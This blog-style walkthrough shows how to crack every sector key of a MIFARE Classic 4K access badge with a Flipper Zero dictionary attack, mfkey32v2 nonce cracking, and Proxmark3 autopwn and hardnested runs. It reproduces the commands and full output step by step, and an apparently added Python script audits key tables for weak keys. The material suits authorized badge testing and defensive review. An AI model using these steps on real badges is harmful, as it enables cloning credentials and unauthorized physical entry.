
Mifare 4K vs Flipper Zero and Proxmark3
March 3rd, 2023
It's been a long time since I wrote anything, but I'm still here.
Today we're going to talk about physical badges. We use them every day at work, at our apartment or in parking lots. It's important to know how to differentiate them and test their security. I'm going to focus on the one I had to break, a MIFARE Classic 4K.
Generalities on MIFARE
The official documentation is here: Mifare Official Doc
Within the MIFARE family you will find:
- MIFARE Classic
- MIFARE Plus
- MIFARE Ultralight
- MIFARE DESFire
As said, I have a Classic family card to test, and more particularly a Classic 4K.
The MIFARE Classic family implements ISO/IEC 14443 Type A; more detailed reading regarding MIFARE is available on Wikipedia.
The Mifare 4K has:
- 40 sectors
- 80 keys
So, of course, you've understood that the goal of the game is to find all this information using Flipper Zero and Proxmark3 :)
Flipper Zero
The Flipper Zero is a nice toolbox, but when it comes to breaking MIFARE security badges it is limited to brute-force (dictionary) attacks. The Flipper Zero embeds dictionaries in its firmware; they are located here:
The default dictionary currently contains ~1,250 hexadecimal keys. When you read a badge, the Flipper Zero tries all the keys in the USER list first and then falls back to the firmware default dictionary. On top of that, the brute force is limited by the NFC protocol, and this limit is around 20 attempts per second. It is quite difficult to perform a real brute force under these conditions. Anyway, it's worth a try on your MIFARE 4K before moving further.
This is the Flipper dictionary attack result on the Mifare 4K:
In my case, the default dictionary was able to retrieve 31 sectors. The Flipper Zero was unable to go further than that, as the Key B was not part of the dictionary.
The only choice left here to move forward is to use the Flipper Zero to read the badge reader and try to compute the keys from the gathered data using an external tool.
In order to gather the badge reader information, select "NFC" and then "Detect Reader".
The gathered information is now available in the file ".mfkey32.log" on the Flipper Zero:
It's time to compute the keys from the information gathered from the badge reader (nonces). The tool we are going to use is named mfkey32v2 and is available on GitHub.
The usage of an external tool is mandatory as the Flipper Zero does not have enough CPU power and memory to perform this task. You can use the Lab Flipper OR the mfkey32v2 program.
Start up your Kali or Ubuntu, deploy mfkey, get the badge reader information file ".mfkey32.log" and execute the following command:
python3 mfkey_extract.py --extract .mfkey32.log
Starting local mode. Extracting key's from ".mfkey32.log"
Computing key's ...
- Key found: FA42ABB29F5D
Add the found key to your Flipper Zero User Dictionary in "NFC -> Assets". Use your Flipper Zero to read the NFC badge again and see that the Flipper Zero is now able to read more sectors of the badge. Now, I am able to access 32 of the 40 sectors.
Depending on the result of your second badge reading, one of the following applies:
- like me, you have unlocked only one additional sector
- you have unlocked all the remaining sectors
- the badge reader opens, congratz!
- the badge reader does not react at all, neither accepting nor refusing. It means that the badge reader is an old piece of crap not respecting the ISO standard at 13.56 MHz. It means you must buy some MIFARE 4K cards online and write the gathered data onto them.
- the badge reader refuses to open. It means that you need to unlock more sectors of the card. You should read the Proxmark3 part of this chapter.
Proxmark3
Let's assume that the previous step did not work for the badge reader, or that you're just stubborn like me and you want to break the whole card. This is where you need Proxmark3.
Proxmark3 has a lot of functionality, but for this exercise I'm going to focus only on what we need and consider that we are doing the attack without the previous information from the Flipper Zero. Just from scratch.
The two functions we are going to use are:
autopwn
hardnested
Everything is in place, you put your badge on the Proxmark3 and you type the following:
[usb] pm3 --> hf mf autopwn
[!] ⚠ no known key was supplied, key recovery might fail
[+] loaded 45 keys from hardcoded default array
[=] running strategy 1
[=] Chunk 0.6s | found 32/32 keys (45)
[+] target sector 0 key type A -- found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack)
[+] target sector 0 key type B -- found valid key [ B0B1B2B3B4B5 ]
[+] target sector 1 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 1 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 2 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 2 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D
[+] 001 | 007 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 002 | 011 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 006 | 027 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] -----+-----+--------------+---+--------------+----
[=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA )
[?] MAD key detected. Try `hf mf mad` for more details
What just happened?
Proxmark3 tried to brute-force the badge using its own dictionary, like the Flipper Zero. It was able to break 15 sectors among 40. Let's continue.
What do we want to do? We want to break into sector 16. We need to find key A, then key B, and continue. This is where we are going to use the hardnested function.
Let's break key A of sector 16 block 64.
[usb] pm3 --> hf mf hardnested --blk 63 -a -k FFFFFFFFFFFF --tblk 64 --ta -w
[=] Target block no 64, target key type: A, known target key: 000000000000 (not set)
[=] File action: write, Slow: No, Tests: 0
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 2 threads and AVX2 SIMD core | |
[=] 0 | 0 | Brute force benchmark: 497 million (2^28.9) keys/s | 140737488355328 | 3d
[=] 4 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 3d
[#] AcquireEncryptedNonces finished
[=] 8 | 0 | Writing acquired nonces to binary file hf-mf-CardID-nonces.bin | 140737488355328 | 3d
[=] 9 | 112 | Apply bit flip properties | 52627398656 | 2min
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces: Auth1 error
[=] 9 | 224 | Apply bit flip properties | 17443852288 | 35s
[#] AcquireEncryptedNonces finished
[=] 10 | 335 | Apply bit flip properties | 5793312768 | 12s
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces finished
[=] 11 | 447 | Apply bit flip properties | 2009283840 | 4s
[#] AcquireEncryptedNonces finished
[=] 12 | 559 | Apply bit flip properties | 1907235968 | 4s
[#] AcquireEncryptedNonces finished
[=] 13 | 668 | Apply bit flip properties | 1247843200 | 3s
[=] 13 | 778 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[=] 14 | 888 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[=] 15 | 997 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[=] 16 | 1105 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[=] 16 | 1212 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces finished
[=] 18 | 1322 | Apply Sum property. Sum(a0) = 120 | 403930912 | 1s
[=] 21 | 1322 | Brute force phase completed. Key found: A0A1A2A3A4A5 | 0 | 0s
Now let's do the same to break into key B of sector 16 Block 64.
hf mf hardnested --blk 63 -a -k FFFFFFFFFFFF --tblk 64 --tb -w
...
...
[=] 35 | 2094 | Brute force phase completed. Key found: B0B1B2B3B4B5 | 0 | 0s
Great! We now have broken into sector 16. Let's re-run the badge reading with the new keys found:
[usb] pm3 --> hf mf chk --4k -f /home/user/Documents/proxmark3/client/dictionaries/mfc_default_keys.dic
[+] loaded 1510 keys from dictionary file /home/user/Documents/proxmark3/client/dictionaries/mfc_default_keys.dic
[=] Start check for keys...
[=] .............................................................................
[=] time in checkkeys 200 seconds
[=] testing to read key B...
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | ------------ | 0 | ------------ | 0
[+] 032 | 143 | ------------ | 0 | ------------ | 0
[+] 033 | 159 | ------------ | 0 | ------------ | 0
[+] 034 | 175 | ------------ | 0 | ------------ | 0
[+] 035 | 191 | ------------ | 0 | ------------ | 0
[+] 036 | 207 | ------------ | 0 | ------------ | 0
[+] 037 | 223 | ------------ | 0 | ------------ | 0
[+] 038 | 239 | ------------ | 0 | ------------ | 0
[+] 039 | 255 | ------------ | 0 | ------------ | 0
[+] -----+-----+--------------+---+--------------+----
Excellent, we are now at the same level as the brute force of the Flipper Zero! Let's try to break the next sector WITHOUT INTERACTING with the badge reader, unlike with the Flipper Zero.
[usb] pm3 --> hf mf hardnested --blk 123 -a -k FFFFFFFFFFFF --tblk 127 --ta -w
[=] Target block no 127, target key type: A, known target key: 000000000000 (not set)
[=] File action: write, Slow: No, Tests: 0
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 2 threads and AVX2 SIMD core | |
[=] 0 | 0 | Brute force benchmark: 541 million (2^29.0) keys/s | 140737488355328 | 3d
[=] 4 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 3d
[#] AcquireEncryptedNonces finished
[=] 7 | 0 | Writing acquired nonces to binary file hf-mf-CardID-nonces.bin | 140737488355328 | 3d
[=] 7 | 112 | Apply bit flip properties | 38384963584 | 71s
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces finished
[=] 8 | 224 | Apply bit flip properties | 3732618240 | 7s
[#] AcquireEncryptedNonces finished
[=] 9 | 336 | Apply bit flip properties | 2997610752 | 6s
[#] AcquireEncryptedNonces finished
[=] 10 | 447 | Apply bit flip properties | 2368766208 | 4s
[#] AcquireEncryptedNonces finished
[=] 11 | 557 | Apply bit flip properties | 2368766208 | 4s
[=] 12 | 668 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 12 | 777 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 13 | 887 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 14 | 997 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 14 | 1108 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 15 | 1219 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 16 | 1329 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces finished
[=] 19 | 1439 | Apply Sum property. Sum(a0) = 128 | 90193328 | 0s
[=] 19 | 1550 | Apply bit flip properties | 90193328 | 0s
[#] AcquireEncryptedNonces finished
[=] 20 | 1658 | Apply bit flip properties | 74804264 | 0s
[#] AcquireEncryptedNonces finished
[=] 21 | 1766 | Apply bit flip properties | 74804264 | 0s
[#] AcquireEncryptedNonces finished
[=] 21 | 1766 | (Ignoring Sum(a8) properties) | 74804264 | 0s
[=] 23 | 1766 | Brute force phase completed. Key found: FA42ABB29F5D | 0 | 0s
Proxmark3 just destroyed the key A of the next sector without needing the badge reader.
Now we want to go FURTHER than what we were able to do with the Flipper Zero. We want to break the Key B of this sector! Using the following syntax:
[usb] pm3 --> hf mf hardnested --blk 123 -a -k FFFFFFFFFFFF --tblk 127 --tb -w
[=] Target block no 127, target key type: B, known target key: 000000000000 (not set)
[=] File action: write, Slow: No, Tests: 0
[=] Hardnested attack starting...
...
...
[=] 26 | 2409 | Brute force phase completed. Key found: 82FAA7A24E65 | 0 | 0s
AMAZING! We've got it!
If you need to, you can continue using the same syntax to break into every other block of your badge. In my specific case I needed to perform it only 1 more time, and after that all the other sectors had the same key. We now have a picture of our 40 sectors and their associated keys.
[usb] pm3 --> hf mf chk --4k -f /home/user/Documents/proxmark3/client/dictionaries/mfc_default_keys.dic
[+] loaded 1513 keys from dictionary file /home/user/Documents/proxmark3/client/dictionaries/mfc_default_keys.dic
[=] Start check for keys...
[=] .................................................................................
[=] time in checkkeys 11 seconds
[=] testing to read key B...
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | FA42ABB29F5D | 1 | 82FAA7A24E65 | 1
[+] 032 | 143 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 033 | 159 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 034 | 175 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 035 | 191 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 036 | 207 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 037 | 223 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 038 | 239 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 039 | 255 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] -----+-----+--------------+---+--------------+----
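Read from the defender's side, the table above is a key-hygiene report: every hardnested run on this page started from a sector that still answered to a default key (`-k FFFFFFFFFFFF`). The following added example (not part of the original post or of Proxmark3) parses `hf mf chk` rows, checks the 4K sector/trailer layout, and flags default keys, identical A/B keys and keys shared between sectors; the function names and report fields are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# Keys that this page's output shows being recovered from built-in default lists.
WELL_KNOWN = {"FFFFFFFFFFFF", "A0A1A2A3A4A5", "B0B1B2B3B4B5"}
KEY = r"([0-9A-F]{12}|-{12})"
ROW = re.compile(r"\[\+\]\s*(\d{3})\s*\|\s*(\d{3})\s*\|\s*" + KEY + r"\s*\|\s*\S\s*\|\s*" + KEY)

# Subset of rows copied from the final key table on this page.
SAMPLE = """\
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | FA42ABB29F5D | 1 | 82FAA7A24E65 | 1
[+] 032 | 143 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 039 | 255 | BAF14C7567DF | 1 | BAF14C7567DF | 1
"""

def trailer_block(sector):
    """Trailer block of a 4K sector: sectors 0-31 hold 4 blocks, 32-39 hold 16."""
    if not 0 <= sector <= 39:
        raise ValueError("a 4K card has sectors 0..39")
    return sector * 4 + 3 if sector < 32 else 128 + (sector - 32) * 16 + 15

def sector_of_block(block):
    """Sector that owns an absolute block number (0..255)."""
    if not 0 <= block <= 255:
        raise ValueError("a 4K card has blocks 0..255")
    return block // 4 if block < 128 else 32 + (block - 128) // 16

def parse_key_table(text):
    """Return {sector: (key_a, key_b)}; unrecovered keys ('------------') become None."""
    rows = {}
    for m in ROW.finditer(text):
        sector, block = int(m[1]), int(m[2])
        if block != trailer_block(sector):
            raise ValueError(f"sector {sector}: block {block} is not its trailer")
        rows[sector] = tuple(None if k.startswith("-") else k for k in (m[3], m[4]))
    return rows

def audit(rows):
    """Flag default keys, identical A/B keys, and non-default keys shared between sectors."""
    report = {"well_known": [], "a_equals_b": [], "reused": {}}
    users = defaultdict(set)
    for sector, (key_a, key_b) in sorted(rows.items()):
        for key in (key_a, key_b):
            if key:
                users[key].add(sector)
        if key_a in WELL_KNOWN or key_b in WELL_KNOWN:
            report["well_known"].append(sector)
        if key_a and key_a == key_b:
            report["a_equals_b"].append(sector)
    report["reused"] = {k: sorted(s) for k, s in users.items()
                        if len(s) > 1 and k not in WELL_KNOWN}
    return report

if __name__ == "__main__":
    print(audit(parse_key_table(SAMPLE)))
```

A card passes this review only when `well_known` is empty; a single sector left on a default key is the foothold the nested-style attacks above need.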
The compromise of the MIFARE 4K badge is complete. We now have all the different keys we need and can even add them to our Flipper Zero to make our life easier.
You are now able to break any MIFARE 4K badge using Proxmark3 and simply add the keys to your Flipper Zero for ease.
Lots of FUN!